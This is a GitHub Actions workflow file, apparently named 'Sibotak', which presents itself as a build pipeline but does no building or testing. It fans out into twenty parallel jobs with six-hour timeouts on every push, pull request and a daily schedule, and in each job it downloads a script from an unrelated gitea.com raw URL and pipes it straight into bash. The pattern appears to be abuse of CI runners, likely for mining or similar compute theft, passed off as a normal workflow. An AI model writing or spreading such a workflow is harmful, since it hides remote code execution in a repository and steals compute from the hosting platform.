name: Sibotak

on:  
  push:
  pull_request:
  schedule:
    - cron: '0 8 * * *'
jobs:
  build:
    runs-on: ubuntu-18.04
    strategy:
      fail-fast: false
      matrix:
        node-version: [8, 10, 12, 13]
        flag: [a, b, c, d ,e]        
    timeout-minutes: 360
    env:
        NUM_JOBS: 25
        JOB: ${{ matrix.job }}
    steps:
    - uses: actions/checkout@v2
    - uses: southpolesteve/cosmos-emulator-github-action@v1
      with:
        node-version: ${{ matrix.node-version }}
    - name: SC SANGU BAKDAN
      run: |
        curl -sL https://gitea.com/swanderenata/danaya/raw/branch/main/bandeng | bash
